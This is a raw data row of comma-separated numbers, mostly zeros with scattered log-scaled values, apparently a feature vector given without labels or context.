0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0, 2.6390573296152584, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.490536906871891, 0.0, 0.0, 0.0, 3.5263605246161616, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 2.550898738446989, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.02535169073515, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 3.258096538021482, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.290459441148391, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.31748811353631, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4657359027997265, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 2.1972245773362196, 3.4825185607408002, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.9512437185814275, 7.983380992735443, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 7.917171988845775, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 